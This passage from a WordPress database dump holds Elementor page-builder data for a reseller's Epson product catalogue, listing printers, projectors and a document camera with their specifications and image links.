]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7748,3450,'_elementor_version','2.5.14'),(7758,3452,'_wp_page_template','template-fullwidth.php'),(7759,3452,'_elementor_edit_mode','builder'),(7760,3452,'_elementor_template_type','post'),(7761,3452,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img 